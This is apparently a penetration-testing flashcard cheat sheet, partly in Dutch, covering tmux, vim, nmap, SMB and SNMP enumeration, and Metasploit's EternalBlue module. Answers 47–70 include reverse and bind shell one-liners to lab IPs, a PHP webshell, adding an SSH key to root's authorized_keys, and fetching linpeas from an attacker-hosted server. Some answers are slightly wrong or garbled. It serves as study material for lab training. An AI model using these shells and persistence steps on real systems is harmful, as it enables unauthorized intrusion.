Cheat Sheet

Question 1

uname -a

Answer 1

Geeft kernel en OS informatie van het systeem

Question 2

netstat -rn

Answer 2

Toon netwerken die toegankelijk zijn via het VPN

Question 3

Wat is de tmux: default prefix

Answer 3

ctrl+b

Question 4

Wat is de tmux: new window

Answer 4

prefix c

Question 5

tmux: switch to window (1)

Answer 5

prefix 1

Question 6

tmux: split pane vertically

Answer 6

prefix shift+%

Question 7

tmux: split pane horizontally

Answer 7

prefix shift+”

Question 8

tmux: switch to the right pane

Answer 8

prefix ->

Question 9

tmux: close current pane

Answer 9

prefix b+X

Question 10

vim: enter insert mode

Answer 10

esc+i

Question 11

vim: back to normal mode

Answer 11

esc

Question 12

vim: Cut character

Answer 12

x

Question 13

vim: Cut word

Answer 13

dw

Question 14

vim: Cut full line

Answer 14

dd

Question 15

vim: Copy word

Answer 15

yw

Question 16

vim: Copy full line

Answer 16

yy

Question 17

vim: Paste

Answer 17

p

Question 18

vim: Go to line number 1.

Answer 18

:1

Question 19

vim: Write the file ‘i.e. save’

Answer 19

:w

Question 20

vim: Quit

Answer 20

:q

Question 21

vim: Quit without saving

Answer 21

:q!

Question 22

vim: Write and quit

Answer 22

:wq

Question 23

Run nmap on an IP

Answer 23

nmap 10.129.42.253

Question 24

Run an nmap script scan on an IP

Answer 24

nmap -sV -sC -p- 10.129.42.253

Question 25

List various available nmap scripts

Answer 25

locate scripts/citrix

Question 26

Run an nmap script on an IP

Answer 26

nmap –script smb-os-discovery.nse -p445 10.10.10.40

Question 27

Grab banner of an open port

Answer 27

netcat 10.10.10.10 22

Question 28

List SMB Shares

Answer 28

smbclient -N -L \\10.129.42.253

Question 29

Connect to an SMB share

Answer 29

smbclient \\10.129.42.253\users

Question 30

Scan SNMP on an IP

Answer 30

snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0

Question 31

Brute force SNMP secret string

Answer 31

onesixtyone -c dict.txt 10.129.42.254

Question 32

Run a directory scan on a website

Answer 32

gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

Question 33

Run a sub-domain scan on a website

Answer 33

gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt

Question 34

Grab website banner

Answer 34

curl -IL https://www.inlanefreight.com

Question 35

List details about the webserver/certificates

Answer 35

whatweb 10.10.10.121

Question 36

List potential directories in robots.txt

Answer 36

curl 10.10.10.121/robots.txt

Question 37

View page source (in Firefox)

Answer 37

ctrl+U

Question 38

Search for public exploits for a web application

Answer 38

searchsploit openssh 7.2

Question 39

MSF: Start the Metasploit Framework

Answer 39

msfconsole

Question 40

MSF: Search for public exploits in MSF

Answer 40

search exploit eternalblue

Question 41

MSF: Start using an MSF module

Answer 41

use exploit/windows/smb/ms17_010_psexec

Question 42

MSF: Show required options for an MSF module

Answer 42

show options

Question 43

MSF: Set a value for an MSF module option

Answer 43

set RHOSTS 10.10.10.40

Question 44

MSF: Unset value

Answer 44

unset RHOSTS

Question 45

MSF: Test if the target server is vulnerable

Answer 45

check

Question 46

MSF: Run the exploit on the target server is vulnerable

Answer 46

exploit / run

Question 47

Start a nc listener on a local port

Answer 47

nc -lvnp 1234

Question 48

Send a reverse shell from the remote server

Answer 48

bash -c ‘bash -i >& /dev/tcp/10.10.10.10/1234 0>&1’

Question 49

Another command to send a reverse shell from the remote server

Answer 49

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

Question 50

Start a bind shell on the remote server

Answer 50

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

Question 51

Connect to a bind shell started on the remote server

Answer 51

nc 10.10.10.1 1234

Question 52

Upgrade shell TTY (1)

Answer 52

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Question 53

Upgrade shell TTY (2)

Answer 53

ctrl+z then stty raw -echo then fg then enter twice

Question 54

Create a webshell php file

Answer 54

echo “<?php system($_GET[‘cmd’]);?>” > /var/www/html/shell.php

Question 55

Execute a command on an uploaded webshell

Answer 55

curl http://SERVER_IP:PORT/shell.php?cmd=id

Question 56

Run linpeas script to enumerate remote server

Answer 56

./linpeas.sh

Question 57

List available sudo privileges

Answer 57

sudo -l

Question 58

Run a command with sudo

Answer 58

sudo -u user /bin/echo Hello World!

Question 59

Switch to root user (if we have access to sudo su)

Answer 59

sudo su -

Question 60

Switch to a user (if we have access to sudo su)

Answer 60

sudo su user -

Question 61

Create a new SSH key

Answer 61

ssh-keygen -f key

Question 62

Add the generated public key to the user

Answer 62

echo “ssh-rsa AAAAB…SNIP…M= user@parrot”&raquo_space; /root/.ssh/authorized_keys

Question 63

SSH to the server with the generated private key

Answer 63

ssh root@10.10.10.10 -i key

Question 64

Start a local webserver

Answer 64

python3 -m http.server 8000

Question 65

Download a file on the remote server from our local machine

Answer 65

wget http://10.10.14.1:8000/linpeas.sh

Question 66

Download a file on the remote server from our local machine

Answer 66

curl http://10.10.14.1:8000/linenum.sh -o linenum.sh

Question 67

Transfer a file to the remote server with scp (requires SSH access)

Answer 67

scp linenum.sh user@remotehost:/tmp/linenum.sh

Question 68

Convert a file to base64

Answer 68

base64 shell -w 0

Question 69

Convert a file from base64 back to its orig

Answer 69

echo f0VMR…SNIO…InmDwU | base64 -d > shell

Question 70

Check the file’s md5sum to ensure it converted correctly

Answer 70

md5sum shell